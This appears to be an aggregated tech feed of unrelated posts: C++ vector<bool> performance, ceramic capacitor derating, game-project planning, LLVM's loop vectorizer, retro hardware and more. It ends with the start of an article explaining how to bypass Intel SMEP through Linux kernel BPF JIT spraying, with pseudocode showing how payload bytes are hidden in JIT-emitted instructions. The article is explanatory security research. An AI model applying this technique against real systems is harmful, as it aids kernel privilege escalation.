http://docs.oracle.com/cd/E19957-01/806-3568/ncg_goldberg.html

One of the creators of the IEEE floating-point math format is William Kahan, and his lecture notes contain excellent insights.

On vector<bool>—Howard Hinnant

On vector<bool>

by Howard Hinnant

vector<bool> has taken a lot of heat over the past decade, and not without reason. However I believe it is way past time to draw back some of the criticism and explore this area with a dispassionate scrutiny of detail.

There are really two issues here:

- Is the data structure of an array of bits a good data structure?

- Should the aforementioned data structure be named vector<bool>?

I have strong opinions on both of these questions. And to get this out of the way up front:

- Yes.

- No.

The array of bits data structure is a wonderful data structure. It is often both a space and speed optimization over the array of bools data structure if properly implemented. However it does not behave exactly as an array of bools, and so should not pretend to be one.

First, what's wrong with vector<bool>?

Because vector<bool> holds bits instead of bools, it can't return a bool& from its indexing operator or iterator dereference. This can play havoc on quite innocent looking generic code. For example:

template <class T>

void

process(T& t)

{

// do something with t

}

template <class T, class A>

void

test(std::vector<T, A>& v)

{

for (auto& t : v)

process(t);

}

The above code works for all T except bool. When instantiated with bool, you will receive a compile time error along the lines of:

error: non-const lvalue reference to type 'std::__bit_reference<std::vector<bool, std::allocator<bool>>, true>' cannot bind to

a temporary of type 'reference' (aka 'std::__bit_reference<std::vector<bool, std::allocator<bool>>, true>')

for (auto& t : v)

^ ~

note: in instantiation of function template specialization 'test<bool, std::allocator<bool>>' requested here

test(v);

^

vector:2124:14: note: selected 'begin' function

with iterator type 'iterator' (aka '__bit_iterator<std::vector<bool, std::allocator<bool>>, false>')

iterator begin()

^

1 error generated.

This is not a great error message. But it is about the best the compiler can do. The user is confronted with implementation details of vector, and the message in a nutshell says that the vector is not working with a perfectly valid range-based for statement. The conclusion the client comes to here is that the implementation of vector is broken. And he would be at least partially correct.
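As a side note, the root cause can be checked directly, and one common workaround (not something the article itself proposes) is to iterate with a forwarding reference. The sketch below assumes a hypothetical helper named count_truthy; auto&& binds both to a real T& and to the temporary proxy object that vector<bool> hands back.

```cpp
#include <cstddef>
#include <type_traits>
#include <vector>

// vector<bool>::reference is a proxy class, not bool&, which is why
// "for (auto& t : v)" cannot bind to the value its iterator returns.
static_assert(!std::is_same<std::vector<bool>::reference, bool&>::value,
              "vector<bool> hands out a proxy, not bool&");
static_assert(std::is_same<std::vector<int>::reference, int&>::value,
              "the primary template hands out a real reference");

// Hypothetical helper: counts the elements that convert to true.
template <class T, class A>
std::size_t count_truthy(std::vector<T, A>& v)
{
    std::size_t n = 0;
    for (auto&& t : v)  // forwarding reference: accepts T& and the proxy alike
        if (t)
            ++n;
    return n;
}
```

This only sidesteps the compile error; generic code that needs a genuine T& (for example, to take its address) still does not work with vector<bool>.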

But consider if, instead of vector<bool> being a specialization, there existed a separate class template std::bit_vector<A = std::allocator<bool>> and the coder had written:

template <class A>

void

test(bit_vector<A>& v)

{

for (auto& t : v)

process(t);

}

Now one gets a similar error message:

error: non-const lvalue reference to type 'std::__bit_reference<std::bit_vector<std::allocator<bool>>, true>' cannot bind to

a temporary of type 'reference' (aka 'std::__bit_reference<std::bit_vector<std::allocator<bool>>, true>')

for (auto& t : v)

^ ~

note: in instantiation of function template specialization 'test<std::allocator<bool>>' requested here

test(v);

^

bit_vector:2124:14: note: selected 'begin' function

with iterator type 'iterator' (aka '__bit_iterator<std::bit_vector<std::allocator<bool>>, false>')

iterator begin()

^

1 error generated.

And although the error message is similar, the coder is far more likely to see that he is using a dynamic array of bits data structure and it is understandable that you can't form a reference to a bit.

I.e. names are important. And creating a specialization that has different behavior than the primary, when the primary template would have worked, is poor practice.

But what's right with vector<bool>?

For the rest of this article assume that we did indeed have a std::bit_vector<A = std::allocator<bool>> and that vector was not specialized on bool. bit_vector<> can be much more than simply a space optimization over vector<bool>, it can also be a very significant performance optimization. But to achieve this higher performance, your vendor has to adapt many of the std::algorithms to have specialized code (optimizations) when processing sequences defined by bit_vector<>::iterators.

find

For example consider this code:

template <class C>

typename C::iterator

test()

{

C c(100000);

c[95000] = true;

return std::find(c.begin(), c.end(), true);

}

How long does std::find take in the above example for:

A. A hypothetical non-specialized vector<bool>?

B. A hypothetical bit_vector<> using an optimized find?

C. A hypothetical bit_vector<> using the unoptimized generic find?

I'm testing on an Intel Core i5 in 64 bit mode. I am normalizing all answers such that the speed of A is 1 (smaller is faster):

- 1.0

- 0.013

- 1.6

An array of bits can be a very fast data structure for a sequential search! The optimized find is inspecting 64 bits at a time. And due to the space optimization, it is much less likely to cause a cache miss. However if the implementation fails to do this, and naively checks one bit at a time, then this giant 75X optimization turns into a significant pessimization.
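To make the "64 bits at a time" idea concrete, here is a minimal sketch of a word-wise search. It is not the libc++ implementation; find_first_set is a hypothetical name, the bits are assumed to be packed into 64-bit words with bit 0 of word 0 first, and the vector is assumed to hold at least enough words for n_bits.

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>

// Returns the index of the first set bit among the first n_bits bits,
// or n_bits if no bit is set.
std::size_t find_first_set(const std::vector<std::uint64_t>& words,
                           std::size_t n_bits)
{
    const std::size_t bits_per_word = 64;
    for (std::size_t w = 0; w * bits_per_word < n_bits; ++w) {
        std::uint64_t word = words[w];
        if (word == 0)
            continue;  // 64 candidate positions rejected with one comparison
        std::size_t bit = 0;
        while ((word & 1u) == 0) {  // locate the lowest set bit in this word
            word >>= 1;
            ++bit;
        }
        const std::size_t idx = w * bits_per_word + bit;
        return idx < n_bits ? idx : n_bits;  // ignore bits past the logical end
    }
    return n_bits;
}
```

A production version would typically replace the inner loop with a count-trailing-zeros instruction, but the main saving comes from skipping zero words wholesale.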

count

std::count can be optimized much like std::find to process a word of bits at a time:

template <class C>

typename C::difference_type

test()

{

C c(100000);

c[95000] = true;

return std::count(c.begin(), c.end(), true);

}

My results are:

- 1.0

- 0.044

- 1.02

Here the results are not quite as dramatic as for the std::find case. However, any time you can speed up your code by a factor of 20, you should do so!
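A word-at-a-time count can be sketched as below. This is an illustration under assumptions, not the library's code: count_set is a hypothetical name, and any unused bits in the last word are assumed to be zero.

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>

// Counts the set bits in a packed bit array, one 64-bit word at a time.
std::size_t count_set(const std::vector<std::uint64_t>& words)
{
    std::size_t total = 0;
    for (std::uint64_t word : words) {
        // Clearing the lowest set bit each pass means the inner loop runs
        // once per set bit, so all-zero words cost a single test.
        while (word != 0) {
            word &= word - 1;
            ++total;
        }
    }
    return total;
}
```

On hardware with a population-count instruction the inner loop collapses to a single operation per word.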

fill

std::fill is yet another example:

template <class C>

void

test()

{

C c(100000);

std::fill(c.begin(), c.end(), true);

}

My results are:

- 1.0

- 0.40

- 38.

The optimized fill is over twice as fast as the non-specialized vector<bool>. But if the vendor neglects to specialize fill for bit-iterators the results are disastrous! Naturally the results are identical for the closely related fill_n.
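The gap between the optimized and unoptimized fill comes from writing whole words instead of masking one bit per iteration. A minimal sketch, assuming a hypothetical fill_bits function over 64-bit words that starts at bit 0 and has enough words for n_bits:

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>

// Sets the first n_bits bits of a packed bit array to value.
void fill_bits(std::vector<std::uint64_t>& words, std::size_t n_bits, bool value)
{
    const std::uint64_t pattern = value ? ~std::uint64_t(0) : std::uint64_t(0);
    const std::size_t full = n_bits / 64;
    for (std::size_t w = 0; w < full; ++w)
        words[w] = pattern;  // 64 bits written per store

    const std::size_t rest = n_bits % 64;
    if (rest != 0) {
        // Partial last word: touch only the low "rest" bits, keep the others.
        const std::uint64_t mask = (std::uint64_t(1) << rest) - 1;
        words[full] = (words[full] & ~mask) | (pattern & mask);
    }
}
```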

copy

std::copy is yet another example:

template <class C>

void

test()

{

C c1(100000);

C c2(100000);

std::copy(c1.begin(), c1.end(), c2.begin());

}

My results are:

- 1.0

- 0.36

- 34.

The optimized copy approaches three times as fast as the non-specialized vector<bool>. But if the vendor neglects to specialize copy for bit-iterators the results are not good. If the copy is not aligned on word boundaries (as it is in the above example), then the optimized copy slows down to the same speed as the copy for A. Results for copy_backward, move and move_backward are similar.

swap_ranges

std::swap_ranges is yet another example:

template <class C>

void

test()

{

C c1(100000);

C c2(100000);

std::swap_ranges(c1.begin(), c1.end(), c2.begin());

}

My results are:

- 1.0

- 0.065

- 4.0

Here bit_vector<> is 15 times faster than an array of bools, and over 60 times as fast as working a bit at a time.

rotate

std::rotate is yet another example:

template <class C>

void

test()

{

C c(100000);

std::rotate(c.begin(), c.begin()+c.size()/4, c.end());

}

My results are:

- 1.0

- 0.59

- 17.9

Yet another example of good results with an optimized algorithm and very poor results without this extra attention.

equal

std::equal is yet another example:

template <class C>

bool

test()

{

C c1(100000);

C c2(100000);

return std::equal(c1.begin(), c1.end(), c2.begin());

}

My results are:

- 1.0

- 0.016

- 3.33

If you're going to compare a bunch of bools, it is much, much faster to pack them into bits and compare a word of bits at a time, rather than compare individual bools, or individual bits!
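Comparing a word of bits at a time might look like the following sketch. equal_bits is a hypothetical name, both ranges are assumed to start at bit 0 of their first word, and both vectors are assumed to hold enough words for n_bits.

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>

// Returns true if the first n_bits bits of a and b are identical.
bool equal_bits(const std::vector<std::uint64_t>& a,
                const std::vector<std::uint64_t>& b,
                std::size_t n_bits)
{
    const std::size_t full = n_bits / 64;
    for (std::size_t w = 0; w < full; ++w)
        if (a[w] != b[w])  // one comparison covers 64 bits
            return false;

    const std::size_t rest = n_bits % 64;
    if (rest == 0)
        return true;
    // Partial last word: compare only the low "rest" bits.
    const std::uint64_t mask = (std::uint64_t(1) << rest) - 1;
    return ((a[full] ^ b[full]) & mask) == 0;
}
```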

Summary

The dynamic array of bits is a very good data structure if attention is paid to optimizing algorithms that can process up to a word of bits at a time. In this case it becomes not only a space optimization but a very significant speed optimization. If such attention to detail is not given, then the space optimization leads to a very significant speed pessimization.

But it is a shame that the C++ committee gave this excellent data structure the name vector<bool> and that it gives no guidance nor encouragement on the critical generic algorithms that need to be optimized for this data structure. Consequently, few std::lib implementations go to this trouble.

EE Bookshelf: Temperature and Voltage Variation of Ceramic Capacitors, or Why Your 4.7µF Capacitor Becomes a 0.33µF Capacitor

Bruno Cardoso Lopes

The original source: http://www.maximintegrated.com/app-notes/index.mvp/id/5527

A big thanks to @SiliconFarmer for the heads up on this interesting article on ceramic capacitors and voltage variation. I switched to exclusively using ceramics a while back, except where there were specific circumstances that made a tantalum or electrolytic a more sensible choice. They’re small, they’re affordable, and they have no polarity issue. This great article from Maxim made me pull out some datasheets, though, and take another look at something I’ve just been adding and ignoring for ages: Temperature and Voltage Variation of Ceramic Capacitors, or Why Your 4.7µF Capacitor Becomes a 0.33µF Capacitor.

Update: The most common large ceramic caps I use are some 10µF 0805 16V X5R ceramics from AVX. There is no mention whatsoever of capacitance loss over voltage in the 3 page datasheet. You have to dig down to page 83 of the generic information for their entire family to find a single chart on something this significant (shame on AVX), and even then they only discuss AC, without going into any detail on package sizes, DC voltage, etc. … though perhaps I just missed something? Seems like a good experiment to pull some caps out and check the numbers myself!

Starting a new game project? Ask the hard questions first

We have all been there. You wanted to start a new game project, and possibly have been dreaming of the possibilities for a long time, crafting stories, drawing sketches, imagining the dazzling effects on that particular epic moment of the game… then you start to talk to some friends about it, they give you feedback, and even might join you in the crazy journey of actually doing something about it.

Fast forward some weeks or months, and you’ve been pulling too many all-nighters, having lots of junk food and heated discussions. You might even have a playable prototype, several character models, animations, a carefully crafted storyline, a website with a logo and everything but… it just doesn’t feel right. It’s not coming together and everyone involved with the project is afraid to say something. What happened? What went wrong? How did such an awesome idea become this huge mess?

Usually all game projects emerge from a simple statement that quickly pushes the mind to imagine the possibilities. Depending on your particular tastes, background and peers, these statements can be like: “Ace Attorney, but solving medical cases, like House M.D.!” (Ace House™), “Wario meets Braid!” (Wraid™), “Starcraft but casual, on a phone!” (Casualcraft™). These ideas can be just fine as starting points, but somewhere down the line the hardest question is: Is this game something worth doing?

When you work at a game studio and a new idea arises, that’s the first question it faces. And depending on the studio’s strengths, business strategy and past experiences, the definition of “worth” is very, very specific. It usually involves a quick set of constraints such as: time, budget, platforms, audience, team, among others. So for a particular studio that has developed Hidden Object Games and has done work for hire creating art, characters and stories for several other games, an idea like Ace House™ can be a very good fit, something they can quickly prototype and pitch to a publisher with convincing arguments to move it forward. However, in the case of a studio focused solely on casual puzzle games that has just one multi-purposed artist/designer and two programmers, it can be rather unfeasible, even more so if all but one say: “What’s Ace Attorney? What’s House M.D.?”

Ok, you might say, “But I’m doing this on my own, so I can fly as free as I want!”. That’s not entirely true. If you want to gather a team behind an idea, all of the team members must agree that the project is worth doing, and even if you do it on your own, you must answer the question for yourself. Having fewer limitations can positively set you free, but use that freedom to find out your personal definition of worth, not to waste months on something that goes nowhere. Unless you can, like, literally burn money.

Why is the project worth doing? is the hardest question, and the one that must be answered with the most sincere honesty by everyone involved. The tricky part is that it is widely different for many people working on a game project out of their regular job or studies. It can be to start learning about game development, to improve a particular set of skills, to start an indie game studio, to beef up a portfolio, etc. It is O.K. to have different goals but they all must map to a mutually agreed level of time commitment, priorities and vision. But even if you figured this out, there are still other issues.

All creative projects can be formulated as a set of risks or uncertainties, and the problem with video game development, given its highly multidisciplinary nature, is that it is very easy to skip the key uncertainties and start working on the “easy” parts instead.

So for example, for the Ace House™ project, it can be lots of fun to start imagining characters and doctors, nurses, patients and whatnot; there’s plenty of T.V. series about medical drama to draw inspiration from, and almost surely you can have a good time developing these characters, writing about them, or doing concept art of medical staff in the Ace Attorney style, but, What about the game? How do you precisely translate the mechanics from Ace Attorney to a medical drama? How is this different from a mere re-skin project? Which mechanics can be taken away? What mechanic can be unique given a medical setting? How can you ensure that Capcom won’t sue you? Are there any medic-like games already? How can we blend them? Is it possible? Is this fun at all? Is “fun” a reasonable expectation or should the experience be designed differently?

Let’s talk about Wraid™ now. If Konami pulled off “Parodius” doing a parody from “Gradius”, How cool would it be to do a parody of Braid using the characters from the Wario Ware franchise? Here you have a starting point for lots of laughs remembering playing Braid, and putting there Wario, Mona, Jimmy T. and the rest of the characters on the game, wacky backgrounds, special effects and everything. But: Is this reasonable? Let’s start with the fact that Konami owns the IP of Gradius so they can do whatever they want to it. Can you get away with making a parody of both Nintendo and Jonathan Blow’s IPs? Sure, sure, the possibilities can be awesome but let’s face it: It is not going to happen. What can be a valuable spin-off though? What if Wario Ware games have a time-manipulation mechanic? What if you take Wario’s mini games and shape them around an art style and setting akin to Braid? (Professor Layton? Anyone?) How can you take the “parody” concept to the next level and just make “references” to lots of IP but the game is something completely new in itself?

What about Casualcraft™? Starcraft can be said to have roughly two levels of enjoyment: as an e-sport, and whatever other pleasure the other people draw from it. If we want to make it casual, it should not be an e-sport, should it? If you’re a Starcraft fan and have experience doing stuff for smartphones, you might think “This should be easy, I can make a prototype quickly”, and given that a mouse interface can be reasonably translated to touch, you start coding, and have a lot of fun implementing gameplay features that pump all your OOP knowledge and creative juices through the roof. But… what exactly does “Casual Starcraft” mean? How can a strategy game be casual? What is the specific thing different from the e-sport experience that we want to bring to a phone? Is it the graphics? Is it the unit building and leveling? Is it playing with other friends? Which one of those should we aim for? Can it still be an RTS? What about asynchronous gameplay? Can this be played without a keyboard? Can it still be fast? Would it fit on a phone? People that play on a phone: would they play this game?

So, all these are tricky and uncomfortable questions, but they are meant to identify the sources of risk and figure out a way to address them. Maybe the ideas I presented here are plain bad, sure, but they are only for illustrative purposes. Since I started working in games, I’ve seen countless ideas from enthusiasts that are not really too far away from these examples anyway. The usual patterns I’ve seen are:

Not identifying the core valuable innovation, and failing to simplify the rest: It is hard to innovate, much harder to do several innovations at once. Also, people have trouble learning about your game when it has too many simultaneous innovations and can quickly get lost, dismissing your game as something they simply “don’t get”. The key is to identify what’s the core innovation or value of your idea, the one single thing that, if done right, can make your game shine, and then adjust all the rest to known formulas. And by “key” innovation I mean something important, critical, not stuff like “I won’t use hearts as a health meter but rainbows!”. That can be cute, but it’s not necessarily a “key innovation”.

Putting known techniques and tools over the idea’s requirements: “I only do 3D modeling so it has to be 3D”, “I know how to use Unity so it has to be done in Unity”, “I only know RPG Maker so let’s make an RPG”. It is perfectly O.K. to stick to what you feel comfortable doing, but then choose a different idea. A game way too heavy on 3D might be awesome, but completely out of scope for a side project. Unity can be a great engine, but if all the other team members can work together in Flash on a game that is completely agreed to live primarily on the web, it can’t hurt to learn Flash. RPG Maker is a great piece of software, but if you can’t really add new mechanics and will concentrate only on creating a story, why not just develop a story then? A comic book project is much more suitable. Why play your particular game when everyone that is into RPGs surely has at least two awesome ones that they still can’t find the time to play? Instead of crippling the value or feasibility of your idea to match your skills and resources, change the idea to something that fits.

Obsessing over a particular area of the game (tech, story, etc): This usually happens when the true reason to do the project is to learn. You’re learning how to code graphic effects, or how to effectively use Design Patterns to code gameplay, a new texturing technique, vehicle and machines modeling, a story communicated through all game assets and no words, etc. You can get a huge experience and knowledge doing this. But then it’s not a game meant to be shipped, it is a learning project, or an excuse to fulfill something you feel passionate about.

Failing to define constraints: The romantic idea of developing a game until “it feels right”. If Blizzard or Valve can do it, why can’t you? Well, because at some point, you’ll want to see something done and not feel that your time has gone to waste. The dirty little secret is that constraints almost always induce creativity instead of hindering it. So choose a set of constraints to start with, at least a time frame and something you would like to see done at particular milestones: Key concept, Prototype, Expanded Prototype, Game.

Refusing to change the idea: This is usually a sign of failing to recognize sunk costs. “I’ve spent so much time on this idea, I must continue until I’m done!”. The ugly truth is that if you’re having serious doubts, those will still be there and will make you feel miserable until you address them, and the sooner you act, the better. It can be that all the time you spent is effectively not wasted, but only when you frame it as your learning source to do the right things.

So if you’re starting a new game project, or are in the middle of one, try asking the tough questions: Do you know why it is worth doing? Do all people involved agree on that? Are you making satisfying progress?

Are you sure there isn’t a question about your project you are afraid to ask because you fear that it can render your idea unfeasible, worthless or messy?

Don’t be frightened, go ahead. If it goes wrong, you will learn, you will improve and the next idea will get to be shaped much better.

A module system for the C family

Doug Gregor of Apple presented a talk on "A module system for the C family" at the 2012 LLVM Developers' Meeting.

The C preprocessor has long been a source of problems for programmers and tools alike. Programmers must contend with widespread macro pollution and include-ordering problems due to ill-behaved headers. Developers habitually employ various preprocessor workarounds, such as LONG_MACRO_PREFIXES, include guards, and the occasional #undef of a library macro to mitigate these problems. Tools, on the other hand, must cope with the inherent scalability problems associated with parsing the same headers repeatedly, because each different preprocessing context could affect how a header is interpreted---even though the programmer rarely wants it. Modules seek to solve this problem by isolating the interface of a particular library and compiling it (once) into an efficient, serialized representation that can be efficiently imported whenever that library is used, improving both the programmer's experience and the scalability of the compilation process.

Slides [PDF] and Video [MP4]

Slides and videos from other presentations from the meeting are also available.

LLVM Developers' Meeting videos

Nintendo 64 Handheld Console

Travis Breen sent in his latest hack where he shrunk a Nintendo 64 into a Handheld Console. To see the build pictures go to the 3:00 point in the video. As you can see from the pictures, getting it all to fit wasn’t an easy task. The case also looks to be a labour of love; it turned out nice enough to be at home on a store shelf.

“Uses a full size N64 board with the cartridge slot relocated. 2 lithium ion batteries give you about 2-3 hours of play time, depending on the game played/brightness level. 7 inch widescreen, stereo speakers, original N64 controller buttons, and expansion pack. The case was made from a sheet of ABS plastic. Used bondo to get the smooth shape; the white paint is an automotive paint from Toyota(super white 040). Can be played from the internal batteries, or from wall power.”

Omar Rodriguez’s Pedals (Bosnian Rainbows) 2012

Omar Rodriguez Lopez

Pedalboard: October 2012

EARTHQUAKER DEVICES Rainbow Machine

EMPRESS VM Super Delay

BOSS Slicer

CATALINBREAD Semaphore tap trem

ELECTRO-HARMONIX Memory Boy

BLACKOUT EFFECTS Whetstone Phaser

EMPRESS Fuzz

LINE 6 DL-4 Delay Modeler

BOSS DD- Digital Delay

New Loop Vectorizer

LLVM’s Loop Vectorizer is now available and will be useful for many people. It is not enabled by default, but can be enabled through clang using the command line flag "-mllvm -vectorize-loops". We plan to enable the Loop Vectorizer by default as part of the LLVM 3.3 release.

The Loop Vectorizer can boost the performance of many loops, including some loops that are not vectorizable by GCC. In one benchmark, Linpack-pc, the Loop Vectorizer boosts the performance of Gaussian elimination of single precision matrices from 984 MFlops to 2539 MFlops - a 2.6X boost in performance. The vectorizer also boosts the “GCC vectorization examples” benchmark by a geomean of 2.15X.

The LLVM Loop Vectorizer has a number of features that allow it to vectorize complex loops. Most of the features described in this post are available as part of the LLVM 3.2 release, but some features were added after the cutoff date. Here is one small example of a loop that the LLVM Loop Vectorizer can vectorize.

int foo(int *A, int *B, int n) {

unsigned sum = 0;

for (int i = 0; i < n; ++i)

if (A[i] > B[i])

sum += A[i] + 5;

return sum;

}

In this example, the Loop Vectorizer uses a number of non-trivial features to vectorize the loop. The ‘sum’ variable is used by consecutive iterations of the loop. Normally, this would prevent vectorization, but the vectorizer can detect that ‘sum’ is a reduction variable. The variable ‘sum’ becomes a vector of integers, and at the end of the loop the elements of that vector are added together to create the correct result. We support a number of different reduction operations, such as multiplication.

Another challenge that the Loop Vectorizer needs to overcome is the presence of control flow in the loop. The Loop Vectorizer is able to "flatten" the IF statement in the code and generate a single stream of instructions. Another important feature is the vectorization of loops with an unknown trip count. In this example, ‘n’ may not be a multiple of the vector width, and the vectorizer has to execute the last few iterations as scalar code. Keeping a scalar copy of the loop increases the code size.

The loop above is compiled into the ARMv7s assembly sequence below. Notice that the IF structure is replaced by the "vcgt" and "vbsl" instructions.

LBB0_3:

vld1.32 {d26, d27}, [r3]

vadd.i32 q12, q8, q9

subs r2, #4

add.w r3, r3, #16

vcgt.s32 q0, q13 , q10

vmla.i32 q12, q13, q11

vbsl q0, q12, q8

vorr q8, q0, q0

bne LBB0_3
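The three transformations described for foo (the reduction split across lanes, the flattened IF, and the scalar remainder) can be imitated by hand in plain C++. This is only an illustration of the idea, not what the vectorizer emits: foo_by_lanes is a hypothetical name, and the lane count of 4 is an assumption chosen to match four 32-bit integers per 128-bit register.

```cpp
// Hand-written imitation of the vectorized reduction in foo.
unsigned foo_by_lanes(const int* A, const int* B, int n)
{
    unsigned lane[4] = {0, 0, 0, 0};  // 'sum' widened into four partial sums
    int i = 0;
    for (; i + 4 <= n; i += 4) {
        for (int k = 0; k < 4; ++k) {
            // Flattened IF: always compute the candidate, then select it or
            // keep the old value (the role played by vcgt plus vbsl).
            const unsigned candidate = lane[k] + (A[i + k] + 5);
            lane[k] = (A[i + k] > B[i + k]) ? candidate : lane[k];
        }
    }
    // End of the vector loop: add the lanes together.
    unsigned sum = lane[0] + lane[1] + lane[2] + lane[3];
    // Scalar copy of the loop for the last n % 4 iterations.
    for (; i < n; ++i)
        if (A[i] > B[i])
            sum += A[i] + 5;
    return sum;
}
```

Because unsigned addition is associative, regrouping the additions into lanes gives the same result as the original sequential loop.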

In the second example below, the Loop Vectorizer must use two more features in order to vectorize the loop. In the loop below, the iteration start and finish points are unknown, and the Loop Vectorizer has a mechanism to vectorize loops that do not start at zero. This feature is important for loops that are converted from Fortran, because Fortran loops start at 1.

Another major challenge in this loop is memory safety. In our example, if the pointers A and B point to consecutive addresses, then it is illegal to vectorize the code because some elements of A will be written before they are read from array B.

Some programmers use the 'restrict' keyword to notify the compiler that the pointers are disjoint, but in our example, the Loop Vectorizer has no way of knowing that the pointers A and B are unique. The Loop Vectorizer handles this loop by placing code that checks, at runtime, if the arrays A and B point to disjoint memory locations. If arrays A and B overlap, then the scalar version of the loop is executed.

void bar(float *A, float *B, float K, int start, int end) {

for (int i = start; i < end; ++i)

A[i] *= B[i] + K;

}

The loop above is compiled into this X86 assembly sequence. Notice the use of the 8-wide YMM registers on systems that support AVX.

LBB1_4:

vmovups (%rdx), %ymm2

vaddps %ymm1, %ymm2, %ymm2

vmovups (%rax), %ymm3

vmulps %ymm2, %ymm3, %ymm2

vmovups %ymm2, (%rax)

addq $32, %rax

addq $32, %rdx

addq $-8, %r11

jne LBB1_4
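The runtime memory check described for bar can be sketched in source form. The names may_overlap and bar_checked are hypothetical, and the block size of 8 merely stands in for an 8-wide vector loop; the actual check the vectorizer emits operates on the IR and may differ in detail.

```cpp
#include <functional>

// True if the accessed ranges A[start, end) and B[start, end) share memory.
bool may_overlap(const float* A, const float* B, int start, int end)
{
    if (start >= end)
        return false;
    std::less<const float*> before;  // total order even across unrelated arrays
    return before(A + start, B + end) && before(B + start, A + end);
}

void bar_checked(float* A, float* B, float K, int start, int end)
{
    if (may_overlap(A, B, start, end)) {
        for (int i = start; i < end; ++i)  // overlap: run the scalar loop
            A[i] *= B[i] + K;
        return;
    }
    int i = start;
    for (; i + 8 <= end; i += 8)           // disjoint: blocks of 8 elements
        for (int k = 0; k < 8; ++k)
            A[i + k] *= B[i + k] + K;
    for (; i < end; ++i)                   // leftover iterations
        A[i] *= B[i] + K;
}
```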

In the last example, we don’t see a loop because it is hidden inside the "accumulate" function of the standard C++ library. This loop uses C++ iterators, which are pointers, and not integer indices, like we saw in the previous examples. The Loop Vectorizer detects pointer induction variables and can vectorize this loop. This feature is important because many C++ programs use iterators.

int baz(int *A, int n) {

return std::accumulate(A, A + n, 0);

}

The loop above is compiled into this x86 assembly sequence.

LBB2_8:

vmovdqu (%rcx,%rdx,4), %xmm1

vpaddd %xmm0, %xmm1, %xmm0

addq $4, %rdx

cmpq %rdx, %rsi

jne LBB2_8
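For readers who want to see the hidden loop, the call to std::accumulate behaves like the pointer-based loop below, where the induction variable is a pointer rather than an integer index. baz_pointer_loop is a hypothetical name used only for this comparison.

```cpp
#include <numeric>

// The version from the text: the loop lives inside std::accumulate.
int baz(int* A, int n)
{
    return std::accumulate(A, A + n, 0);
}

// Roughly what that call expands to: a loop driven by a pointer.
int baz_pointer_loop(const int* A, int n)
{
    int sum = 0;
    for (const int* p = A, *last = A + n; p != last; ++p)
        sum += *p;  // p is the pointer induction variable
    return sum;
}
```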

The Loop Vectorizer is a target independent IR-level optimization that depends on target-specific information from the different backends. It needs to select the optimal vector width and to decide if vectorization is worthwhile. Users can force a certain vector width using the command line flag "-mllvm -force-vector-width=X", where X is the number of vector elements. At the moment, only the X86 backend provides detailed cost information, while other targets use a less accurate method.

The work on the Loop Vectorizer is not complete and the vectorizer has a long way to go. We plan to add additional vectorization features such as automatic alignment of buffers, vectorization of function calls and support for user pragmas. We also plan to improve the quality of the generated code.

Linux Kernel Drops Support For Old Intel 386 CPUs

Simulating CRT or Vector displays for more realistic emulation

Scaled down it’s not as obvious that this image isn’t a crystal clear rendering of Mortal Kombat gameplay. But we’ve linked it to the full size version (just click on the image) so that you can get a better look. Notice the scan lines? This is the result of an effort to more accurately mimic the original hardware displays used in classic games. [Jason Scott] takes a look at the initiative by describing what he thinks is missing with the picture perfect quality of modern emulators.

One such effort is being mounted for MAME (Multiple Arcade Machine Emulator). There is a series of filters available — each with their own collection of settings — that will make your modern LCD display look like it’s a run-of-the-mill CRT. This is a novelty if you’re a casual gamer who dusts off the coin-op favorites twice a year. But if you’re building a standalone game cabinet this may be a suitable alternative to sourcing a working display that’s already decades old.

Masters: ARM atomic operations

Attacking hardened Linux systems with kernel JIT spraying

Intel's new Ivy Bridge CPUs support a security feature called Supervisor Mode Execution Protection (SMEP). It's supposed to thwart privilege escalation attacks, by preventing the kernel from executing a payload provided by userspace. In reality, there are many ways to bypass SMEP.

This article demonstrates one particularly fun approach. Since the Linux kernel implements a just-in-time compiler for Berkeley Packet Filter programs, we can use a JIT spraying attack to build our attack payload within the kernel's memory. Along the way, we will use another fun trick to create thousands of sockets even if RLIMIT_NOFILE is set as low as 11.

If you have some idea what I'm talking about, feel free to skip the next few sections and get to the gritty details. Otherwise, I hope to provide enough background that anyone with some systems programming experience can follow along. The code is available on GitHub too.

Note to script kiddies: This code won't get you root on any real system. It's not an exploit against current Linux; it's a demonstration of how such an exploit could be modified to bypass SMEP protections.

Kernel exploitation and SMEP

The basis of kernel security is the CPU's distinction between user and kernel mode. Code running in user mode cannot manipulate kernel memory. This allows the kernel to store things (like the user ID of the current process) without fear of tampering by userspace code.

In a typical kernel exploit, we trick the kernel into jumping to our payload code while the CPU is still in kernel mode. Then we can mess with kernel data structures and gain privileges. The payload can be an ordinary function in the exploit program's memory. After all, the CPU in kernel mode is allowed to execute user memory: it's allowed to do anything!

But what if it wasn't? When SMEP is enabled, the CPU will block any attempt to execute user memory while in kernel mode. (Of course, the kernel still has ultimate authority and can disable SMEP if it wants to. The goal is to prevent unintended execution of userspace code, as in a kernel exploit.)

So even if we find a bug which lets us hijack kernel control flow, we can only direct it towards legitimate kernel code. This is a lot like exploiting a userspace program with no-execute data, and the same techniques apply.

If you haven't seen any kernel exploits before, you might want to check out the talk I gave, or the many references linked from those slides.

JIT spraying

JIT spraying [PDF] is a viable tactic when we (the attacker) control the input to a just-in-time compiler. The JIT will write into executable memory on our behalf, and we have some control over what it writes.

Of course, a JIT compiling untrusted code will be careful with what instructions it produces. The trick of JIT spraying is that seemingly innocuous instructions can be trouble when looked at another way. Suppose we input this (pseudocode) program to a JIT:

x = 0xa8XXYYZZ
x = 0xa8PPQQRR
x = ...

(Here XXYYZZ and PPQQRR stand for arbitrary three-byte quantities.) The JIT might decide to put variable x in the %eax machine register, and produce x86 code like this:

machine code      assembly (AT&T syntax)
b8 ZZ YY XX a8    mov $0xa8XXYYZZ, %eax
b8 RR QQ PP a8    mov $0xa8PPQQRR, %eax
b8 ...

Looks harmless enough. But suppose we use a vulnerability elsewhere to direct control flow to the second byte of this program. The processor will then see an instruction stream like

ZZ YY XX    (payload instruction)
a8 b8       test $0xb8, %al
RR QQ PP    (payload instruction)
a8 b8       test $0xb8, %al
...

We control those bytes ZZ YY XX and RR QQ PP. So we can smuggle any sequence of three-byte x86 instructions into an executable memory page. The classic scenario is browser exploitation: we embed our payload into a JavaScript or Flash program as above, and then exploit a browser bug to redirect control into the JIT-compiled code. But it works equally well against kernels, as we shall see.
